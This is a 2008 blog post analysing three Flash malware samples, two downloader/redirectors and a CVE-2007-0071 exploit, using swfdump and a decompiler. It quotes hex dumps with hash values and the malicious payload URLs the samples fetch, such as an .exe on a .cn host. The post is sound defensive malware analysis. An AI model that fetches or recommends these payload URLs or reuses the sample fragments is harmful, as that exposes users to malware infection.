Posted by: realsecurity | September 21, 2008

Flash malware – downloaders and exploit

Watching a recent SANS webcast by Lenny Zeltser peaked my curiosity in flash based malware. I decided to have a closer look at some flash based malware which I had collected to try and gain some more insight into how to analyze it. I’ll cover 3 samples and what I was able to find out about them.

Generally, flash malware is pretty challenging to analyze. The tools that are available are not as mature as their executable or javascript cousins. I had to use a variety of tools, some free, some commercial. Analyzing a flash file statically involves dissasembling the swf and/or dumping it’s contents using swfdump. It is also possible to do some additional analysis using the debugger built into Adobe Flash CS3 (30 day trial version available).

Analysis difficulties

Most flash malware is written using action script 8 or 9. Many free tools will work with one version or the other, but not both. I opted for a commercial tool (swf decompiler) so as not to worry about this issue. Due to the way the malware is written many tools do not produce an accurate disassembly. The CS3 debugger was unable to handle the files I threw at it because of the way they were written.

Please keep in mind that many flash analysis tools are not specifically meant to handle malware. Many flash tools will automatically play the swf movie once you load it. Analysis should be done in a VM with the network card disabled.

Tools

swftools (swfdump)
Sothink SWF Decompiler
Adobe Flash CS3

4562.swf
MD5 – 77AEB0248AD3BBD7B0CA5CFBEBEEEC05
Virus total results

Our first sample is a downloader/redirector written in flash. Running swfdump on the file yields some great information. I found this sample at least a month or two ago, I’m surprised AV detection is still so terrible.

[HEADER] File version: 8
[HEADER] File is zlib compressed. Ratio: 42%
[HEADER] File size: 1790
[HEADER] Frame count: 1
[….]
( 52 bytes) action: Constantpool(5 entries) String:”v” String:”/:$version” String:”http://www.seove.com.cn/” String:”f.swf” String:”_root”

This tells us the file uses flash 8 (action script 2), it has been compressed, is 1790 bytes and contains one frame (movie frame). It is pretty clear that the movie contacts seove.com.cn to download additional content, but how is the URL put together?

First, the swf must be dumped into fla format for analysis. Once decompiled we can import into CS3 and debug. The problem however is that the debugger throws a few errors relating to the strange hex characters used in the script \x01 \x02 \x04 \x05. These characters are not printable, see this ascii chart for details. The debugger does show us the contents of the $version variable however which is the key to the puzzle.


1

Since the debugger won’t work, we can use another technique. The flash player has a option called “simulate download” which will cause the movie to run. The output window in CS3 returns on the full URL that it is trying to connect to!


1

ie.swf
MD5 – 2A757228062D69539086F4E72883083A
Virus total results

This is a new sample from a few days ago. It is used as a downloader/redirector as well. AV detection is non existent.

[HEADER] File version: 9
[HEADER] File size: 142
[HEADER] Frame count: 1
[….]
[00c] 97 DOACTION
( 2 bytes) action: Jump 44
( 0 bytes) action: BitLShift
( 0 bytes) action: unknown[02]
( 0 bytes) action: End
-=> 99 02 00 2c 00 63 02 00 00 00 96 04 00 08 00 08 ™..,.c….–…..
-=> 01 1c 3c 96 02 00 08 00 1c 96 02 00 08 02 47 96 .. 02 00 08 03 1c 9a 01 00 40 07 00 00 63 02 00 fc …..š..@…c..ü
-=> ff 88 28 00 04 00 66 6c 61 73 68 63 63 56 65 72 ÿˆ(…flashccVer
-=> 73 69 6f 6e 00 2f 3a 24 76 65 72 73 69 6f 6e 00 sion./:$version.
-=> 69 2e 73 77 66 00 5f 72 6f 6f 74 00 99 02 00 a9 i.swf._root.™..©

This is a much more compact sample, only 142 bytes in size and uses Flash 9 (action script 3). SWF decompiler did not produce a detailed enough disassembly of this file, so I could only use the simulate download method on it. Again, this uses $version and references “flashcc”.


1

This time the malware doesn’t give us the full URL in the output window, but is good enough to lead us to the next file. Just do a search for a flashcc domain and append the rest of the URL.

i47.swf
md5 – 91428BA59E7234267DA42F9B93F00851
Virus total results

Our last sample is an exploit for CVE-2007-0071. A great analysis of this exploit is covered by Zarestel. Debugging this sample wasn’t possible as it crashed CS3. Only swfdump provided good information.

==== Error: Real Filesize (1664) doesn’t match header Filesize (1544) ====
[HEADER] File version: 9
[HEADER] File size: 1544
[HEADER] Frame count: 771
[….]
-=> 5e b2 5e 00 68 74 74 70 3a 2f 2f 73 64 66 73 64 ^²^.http://sdfsd
-=> 33 33 2e 63 6e 2f 78 7a 2f 78 2e 65 78 65 00 00 33.cn/xz/x.exe..
[….]
-=> 74 74 74 74 74 74 74 74 74 74 74 63 73 61 66 65 tttttttttttcsafe
-=> 79 75 74 69 61 6e 51 51 3a 35 33 36 36 37 37 37 yutianQQ:5366XXXX
-=> 74 74 74 74 tttt

The next stage payload is easily visible here. Also, the malware author is kind enough to leave their QQ contact number at the end of the file.

Happy hunting!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Categories

%d bloggers like this: